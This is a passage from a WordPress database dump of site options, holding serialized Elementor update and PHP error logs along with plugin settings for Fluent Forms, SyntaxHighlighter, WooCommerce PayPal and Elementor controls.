14:31:56\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-01-20 14:31:56\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"c73f8f429de0b19f987c6d31cbea6c8c\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-01-20 14:31:56\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-01-20 14:31:56\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"b158dceb95442907d9bbab1b6edf6120\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-01-20 14:31:56\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-01-20 14:31:56\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"cad33de54a6eaf5a6510dfd8dc7fc272\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-01-20 14:31:56\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.26.5\";s:2:\"to\";s:6:\"3.27.0\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-01-20 14:31:56\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.26.5\";s:2:\"to\";s:6:\"3.27.0\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"8386dacbeaad3a77ef79e267387808e9\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-04-22 04:12:26\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.27.0\";s:2:\"to\";s:6:\"3.28.3\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-04-22 04:12:26\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.27.0\";s:2:\"to\";s:6:\"3.28.3\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"428f5d19ba34bf114cdbd42bfee5bd89\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-04-22 04:12:50\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-04-22 04:12:50\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"b7370989d638e5e0292ade868fcef9d4\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-04-22 04:12:50\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-04-22 04:12:50\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"406e26dd51e274fbb5f4dc5ea47a4c33\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-04-22 04:12:50\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-04-22 04:12:50\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"ea9c1829c75b6b0342d337fc2bcb67d3\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-04-22 04:12:50\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.27.0\";s:2:\"to\";s:6:\"3.28.3\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-04-22 04:12:50\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.27.0\";s:2:\"to\";s:6:\"3.28.3\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"da09e9358fa7f30011b7388d281caf0a\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-06-25 17:16:31\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:36:\"elementor::elementor_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-06-25 17:16:31\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:36:\"elementor::elementor_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"d10c3d6f9f0b24e37081374d20824543\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-06-25 17:16:31\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-06-25 17:16:31\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:44:\"Elementor/Upgrades - _on_each_version Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"08ef4176cecc347ba4d11f876eefd8d4\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-06-25 17:16:31\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-06-25 17:16:31\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:46:\"Elementor/Upgrades - _on_each_version Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"bd3c5cc94ae510bd61b2fd1674f94999\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-06-25 17:16:31\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.28.3\";s:2:\"to\";s:6:\"3.29.2\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-06-25 17:16:31\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.28.3\";s:2:\"to\";s:6:\"3.29.2\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"6b8a6b3eb4f35f1a3c2acc7269e4b1d8\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-06-25 17:16:31\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.28.3\";s:2:\"to\";s:6:\"3.29.2\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-06-25 17:16:31\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.28.3\";s:2:\"to\";s:6:\"3.29.2\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"e38bdb6364b47bab4ffc43e867fca730\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-06-25 17:16:32\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.28.3\";s:2:\"to\";s:6:\"3.29.2\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-06-25 17:16:32\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"3.28.3\";s:2:\"to\";s:6:\"3.29.2\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"f07a7c35ca45ec0ab500011cbdd2fc1a\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-06-25 17:41:50\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:44:\"elementor-pro::elementor_pro_updater Started\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-06-25 17:41:50\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:44:\"elementor-pro::elementor_pro_updater Started\";s:4:\"type\";s:4:\"info\";}}s:32:\"875f8c881921ba4a82f696d998cac2ea\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-06-25 17:41:51\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:48:\"Elementor Pro/Upgrades - _on_each_version Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-06-25 17:41:51\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:48:\"Elementor Pro/Upgrades - _on_each_version Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"01e715adb35cc3a6c236b25e73872481\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-06-25 17:41:51\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor Pro/Upgrades - _on_each_version Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-06-25 17:41:51\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:50:\"Elementor Pro/Upgrades - _on_each_version Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"7e26819c042234840c979134557d3cfb\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-06-25 17:41:51\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:13:\"Elementor Pro\";s:4:\"from\";s:6:\"3.26.3\";s:2:\"to\";s:6:\"3.29.2\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-06-25 17:41:51\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:13:\"Elementor Pro\";s:4:\"from\";s:6:\"3.26.3\";s:2:\"to\";s:6:\"3.29.2\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"a8956c555c7b1212ae8ed5b3e9609a8b\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2025-06-25 17:41:51\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:47:\"Elementor data updater process has been queued.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:13:\"Elementor Pro\";s:4:\"from\";s:6:\"3.26.3\";s:2:\"to\";s:6:\"3.29.2\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2025-06-25 17:41:51\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:13:\"Elementor Pro\";s:4:\"from\";s:6:\"3.26.3\";s:2:\"to\";s:6:\"3.29.2\";}s:7:\"message\";s:47:\"Elementor data updater process has been queued.\";s:4:\"type\";s:4:\"info\";}}s:32:\"e08dc8801dea680e1228c8c693f257ee\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0date\";s:19:\"2025-06-25 17:43:49\";s:7:\"\0*\0type\";s:7:\"warning\";s:10:\"\0*\0message\";s:38:\"Trying to access array offset on false\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:1:{i:0;a:3:{s:8:\"function\";s:8:\"shutdown\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:10;s:14:\"\0*\0times_dates\";a:10:{i:0;s:19:\"2025-06-25 17:43:49\";i:1;s:19:\"2025-07-13 13:53:42\";i:2;s:19:\"2025-08-16 10:25:17\";i:3;s:19:\"2025-09-19 06:48:33\";i:4;s:19:\"2025-09-19 07:07:38\";i:5;s:19:\"2025-09-20 16:24:06\";i:6;s:19:\"2025-09-20 16:27:28\";i:7;s:19:\"2025-09-20 19:56:16\";i:8;s:19:\"2025-09-23 04:43:08\";i:9;s:19:\"2025-09-23 14:14:16\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:7:\"warning\";s:7:\"message\";s:38:\"Trying to access array offset on false\";s:4:\"file\";s:83:\"/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/managers/image.php\";s:4:\"line\";i:113;s:5:\"trace\";b:1;}s:7:\"\0*\0file\";s:83:\"/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/managers/image.php\";s:7:\"\0*\0line\";i:113;}s:32:\"62a008db21ceb2eae4447678b545942b\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0date\";s:19:\"2025-08-16 10:25:10\";s:7:\"\0*\0type\";s:6:\"notice\";s:10:\"\0*\0message\";s:81:\"hexdec(): Passing null to parameter #1 ($hex_string) of type string is deprecated\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:1:{i:0;a:3:{s:8:\"function\";s:8:\"shutdown\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:4;s:14:\"\0*\0times_dates\";a:4:{i:0;s:19:\"2025-08-16 10:25:10\";i:1;s:19:\"2025-09-20 19:56:10\";i:2;s:19:\"2025-09-23 04:42:48\";i:3;s:19:\"2025-09-23 14:14:06\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:6:\"notice\";s:7:\"message\";s:81:\"hexdec(): Passing null to parameter #1 ($hex_string) of type string is deprecated\";s:4:\"file\";s:88:\"/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/base/controls-stack.php\";s:4:\"line\";i:230;s:5:\"trace\";b:1;}s:7:\"\0*\0file\";s:88:\"/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/base/controls-stack.php\";s:7:\"\0*\0line\";i:230;}s:32:\"3cc0300bf1397b956c88551e79afe366\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0date\";s:19:\"2025-09-19 06:52:40\";s:7:\"\0*\0type\";s:5:\"error\";s:10:\"\0*\0message\";s:1898:\"Uncaught TypeError: Elementor\\Modules\\Home\\Transformations\\Filter_Plugins::get_add_ons_installation_status(): Argument #1 ($add_ons) must be of type array, null given, called in /var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/home/transformations/filter-plugins.php on line 21 and defined in /var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/home/transformations/filter-plugins.php:30\nStack trace:\n#0 /var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/home/transformations/filter-plugins.php(21): Elementor\\Modules\\Home\\Transformations\\Filter_Plugins->get_add_ons_installation_status()\n#1 /var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/home/classes/transformations-manager.php(57): Elementor\\Modules\\Home\\Transformations\\Filter_Plugins->transform()\n#2 /var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/home/api.php(25): Elementor\\Modules\\Home\\Classes\\Transformations_Manager->run_transformations()\n#3 /var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/home/api.php(19): Elementor\\Modules\\Home\\API->transform_home_screen_data()\n#4 /var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/home/module.php(102): Elementor\\Modules\\Home\\API->get_home_screen_items()\n#5 /var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/home/module.php(64): Elementor\\Modules\\Home\\Module->get_app_js_config()\n#6 /var/www/html/ictbank/blog/wp-includes/class-wp-hook.php(324): Elementor\\Modules\\Home\\Module->enqueue_home_screen_scripts()\n#7 /var/www/html/ictbank/blog/wp-includes/class-wp-hook.php(348): WP_Hook->apply_filters()\n#8 /var/www/html/ictbank/blog/wp-includes/plugin.php(517): WP_Hook->do_action()\n#9 /var/www/html/ictbank/blog/wp-admin/admin-header.php(144): do_action()\n#10 /var/www/html/ictbank/blog/wp-admin/admin.php(240): require_once('...')\n#11 {main}\n thrown\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:1:{i:0;a:3:{s:8:\"function\";s:8:\"shutdown\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:5;s:14:\"\0*\0times_dates\";a:5:{i:0;s:19:\"2025-09-19 06:52:40\";i:1;s:19:\"2025-09-20 19:50:19\";i:2;s:19:\"2025-09-20 19:50:33\";i:3;s:19:\"2025-09-20 19:51:09\";i:4;s:19:\"2025-09-20 19:51:15\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:5:\"error\";s:7:\"message\";s:1861:\"Uncaught TypeError: Elementor\\Modules\\Home\\Transformations\\Filter_Plugins::get_add_ons_installation_status(): Argument #1 ($add_ons) must be of type array, null given, called in /var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/home/transformations/filter-plugins.php on line 21 and defined in /var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/home/transformations/filter-plugins.php:30\nStack trace:\n#0 /var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/home/transformations/filter-plugins.php(21): Elementor\\Modules\\Home\\Transformations\\Filter_Plugins->get_add_ons_installation_status()\n#1 /var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/home/classes/transformations-manager.php(57): Elementor\\Modules\\Home\\Transformations\\Filter_Plugins->transform()\n#2 /var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/home/api.php(25): Elementor\\Modules\\Home\\Classes\\Transformations_Manager->run_transformations()\n#3 /var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/home/api.php(19): Elementor\\Modules\\Home\\API->transform_home_screen_data()\n#4 /var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/home/module.php(102): Elementor\\Modules\\Home\\API->get_home_screen_items()\n#5 /var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/home/module.php(64): Elementor\\Modules\\Home\\Module->get_app_js_config()\n#6 /var/www/html/ictbank/blog/wp-includes/class-wp-hook.php(324): Elementor\\Modules\\Home\\Module->enqueue_home_screen_scripts()\n#7 /var/www/html/ictbank/blog/wp-includes/class-wp-hook.php(348): WP_Hook->apply_filters()\n#8 /var/www/html/ictbank/blog/wp-includes/plugin.php(517): WP_Hook->do_action()\n#9 /var/www/html/ictbank/blog/wp-admin/admin-header.php(144): do_action()\n#10 /var/www/html/ictbank/blog/wp-admin/admin.php(240): require_once(\'...\')\n#11 {main}\n thrown\";s:4:\"file\";s:103:\"/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/home/transformations/filter-plugins.php\";s:4:\"line\";i:30;s:5:\"trace\";b:1;}s:7:\"\0*\0file\";s:103:\"/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/home/transformations/filter-plugins.php\";s:7:\"\0*\0line\";i:30;}s:32:\"ce62334115008357c162d2bd324ab392\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0date\";s:19:\"2025-09-19 06:55:58\";s:7:\"\0*\0type\";s:7:\"warning\";s:10:\"\0*\0message\";s:58:\"Attempt to read property "display_name" on false\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:1:{i:0;a:3:{s:8:\"function\";s:8:\"shutdown\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:3;s:14:\"\0*\0times_dates\";a:3:{i:0;s:19:\"2025-09-19 06:55:58\";i:1;s:19:\"2025-09-19 07:07:43\";i:2;s:19:\"2025-09-20 16:27:49\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:7:\"warning\";s:7:\"message\";s:48:\"Attempt to read property \"display_name\" on false\";s:4:\"file\";s:99:\"/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/template-library/sources/local.php\";s:4:\"line\";i:680;s:5:\"trace\";b:1;}s:7:\"\0*\0file\";s:99:\"/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/template-library/sources/local.php\";s:7:\"\0*\0line\";i:680;}}','off'),
(101675,'pwmellat_dismissed','1','yes'),
(101842,'category_children','a:7:{i:9;a:4:{i:0;i:1;i:1;i:10;i:2;i:19;i:3;i:67;}i:8;a:3:{i:0;i:9;i:1;i:21;i:2;i:34;}i:21;a:2:{i:0;i:22;i:1;i:29;}i:50;a:1:{i:0;i:51;}i:51;a:4:{i:0;i:52;i:1;i:53;i:2;i:54;i:3;i:55;}i:71;a:2:{i:0;i:73;i:1;i:140;}i:155;a:1:{i:0;i:156;}}','yes'),
(102096,'auxin_show_rate_scale_notice','0','yes'),
(102114,'woocommerce_inbox_variant_assignment','5','yes'),
(103710,'syntaxhighlighter_settings','a:16:{s:9:\"shversion\";i:3;s:5:\"theme\";s:8:\"midnight\";s:6:\"gutter\";i:1;s:7:\"toolbar\";i:1;s:9:\"autolinks\";i:1;s:9:\"smarttabs\";i:1;s:9:\"wraplines\";i:1;s:9:\"quickcode\";i:1;s:9:\"classname\";s:0:\"\";s:9:\"firstline\";i:1;s:14:\"padlinenumbers\";s:4:\"true\";s:7:\"tabsize\";i:4;s:5:\"title\";s:0:\"\";s:14:\"loadallbrushes\";i:0;s:8:\"collapse\";i:0;s:5:\"light\";i:0;}','yes'),
(105130,'fluentform_entry_details_migrated','yes','no'),
(105131,'fluentform_db_fluentform_logs_added','1','no'),
(105132,'fluentform_scheduled_actions_migrated','yes','no'),
(105133,'__fluentform_global_form_settings','a:1:{s:6:\"layout\";a:5:{s:14:\"labelPlacement\";s:3:\"top\";s:17:\"asteriskPlacement\";s:14:\"asterisk-right\";s:20:\"helpMessagePlacement\";s:10:\"with_label\";s:21:\"errorMessagePlacement\";s:6:\"inline\";s:12:\"cssClassName\";s:0:\"\";}}','no'),
(105134,'_fluentform_installed_version','4.1.0','no'),
(105135,'fluentform_global_modules_status','a:9:{s:9:\"mailchimp\";s:2:\"no\";s:14:\"activecampaign\";s:2:\"no\";s:16:\"campaign_monitor\";s:2:\"no\";s:17:\"constatantcontact\";s:2:\"no\";s:11:\"getresponse\";s:2:\"no\";s:8:\"icontact\";s:2:\"no\";s:7:\"webhook\";s:2:\"no\";s:6:\"zapier\";s:2:\"no\";s:5:\"slack\";s:2:\"no\";}','no'),
(105136,'widget_fluentform_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(114311,'wp_force_deactivated_plugins','a:0:{}','off'),
(114320,'woocommerce_downloads_redirect_fallback_allowed','no','no'),
(114321,'woocommerce_paypal_settings','a:23:{s:7:\"enabled\";s:2:\"no\";s:5:\"title\";s:6:\"PayPal\";s:11:\"description\";s:85:\"Pay via PayPal; you can pay with your credit card if you don\'t have a PayPal account.\";s:5:\"email\";s:25:\"masoud.nikoofar@gmail.com\";s:8:\"advanced\";s:0:\"\";s:8:\"testmode\";s:2:\"no\";s:5:\"debug\";s:2:\"no\";s:16:\"ipn_notification\";s:3:\"yes\";s:14:\"receiver_email\";s:25:\"masoud.nikoofar@gmail.com\";s:14:\"identity_token\";s:0:\"\";s:14:\"invoice_prefix\";s:3:\"WC-\";s:13:\"send_shipping\";s:3:\"yes\";s:16:\"address_override\";s:2:\"no\";s:13:\"paymentaction\";s:4:\"sale\";s:9:\"image_url\";s:0:\"\";s:11:\"api_details\";s:0:\"\";s:12:\"api_username\";s:0:\"\";s:12:\"api_password\";s:0:\"\";s:13:\"api_signature\";s:0:\"\";s:20:\"sandbox_api_username\";s:0:\"\";s:20:\"sandbox_api_password\";s:0:\"\";s:21:\"sandbox_api_signature\";s:0:\"\";s:12:\"_should_load\";s:3:\"yes\";}','yes'),
(138118,'elementor_controls_usage','a:3:{s:6:\"header\";a:7:{s:5:\"image\";a:2:{s:5:\"count\";i:2;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:3:{s:5:\"image\";i:2;s:10:\"image_size\";i:1;s:5:\"align\";i:1;}}}}s:6:\"column\";a:2:{s:5:\"count\";i:11;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:7:{s:12:\"_inline_size\";i:11;s:5:\"align\";i:4;s:16:\"content_position\";i:4;s:19:\"_inline_size_mobile\";i:3;s:12:\"align_mobile\";i:2;s:23:\"content_position_mobile\";i:1;s:12:\"align_tablet\";i:1;}}s:8:\"advanced\";a:2:{s:34:\"aux_core_common_custom_css_section\";a:1:{s:10:\"custom_css\";i:3;}s:19:\"_section_responsive\";a:2:{s:11:\"hide_tablet\";i:1;s:11:\"hide_mobile\";i:1;}}}}s:12:\"aux_menu_box\";a:2:{s:5:\"count\";i:5;s:8:\"controls\";a:3:{s:7:\"content\";a:2:{s:7:\"general\";a:3:{s:8:\"splitter\";i:2;s:9:\"indicator\";i:2;s:9:\"menu_slug\";i:3;}s:19:\"mobile_menu_section\";a:3:{s:14:\"display_burger\";i:4;s:10:\"breakpoint\";i:4;s:20:\"burger_menu_location\";i:3;}}s:5:\"style\";a:5:{s:17:\"menu_item_section\";a:11:{s:10:\"item_color\";i:4;s:25:\"menu_item_typo_typography\";i:4;s:26:\"menu_item_typo_font_family\";i:4;s:24:\"menu_item_typo_font_size\";i:4;s:26:\"menu_item_typo_font_weight\";i:4;s:26:\"menu_item_typo_line_height\";i:4;s:12:\"item_padding\";i:3;s:5:\"align\";i:2;s:31:\"menu_item_typo_font_size_tablet\";i:2;s:29:\"menu_item_typo_text_transform\";i:3;s:16:\"item_hover_color\";i:2;}s:25:\"menu_item_current_section\";a:2:{s:39:\"menu_item_current_typography_typography\";i:1;s:40:\"menu_item_current_typography_font_weight\";i:1;}s:21:\"submenu_style_section\";a:1:{s:12:\"submenu_skin\";i:1;}s:14:\"burger_section\";a:2:{s:16:\"burger_btn_color\";i:2;s:16:\"burger_btn_style\";i:2;}s:15:\"fullscr_section\";a:4:{s:18:\"fullscr_item_color\";i:2;s:33:\"fullscr_menu_item_typo_typography\";i:2;s:39:\"fullscr_menu_item_typo_font_size_mobile\";i:2;s:34:\"fullscr_menu_item_typo_font_weight\";i:2;}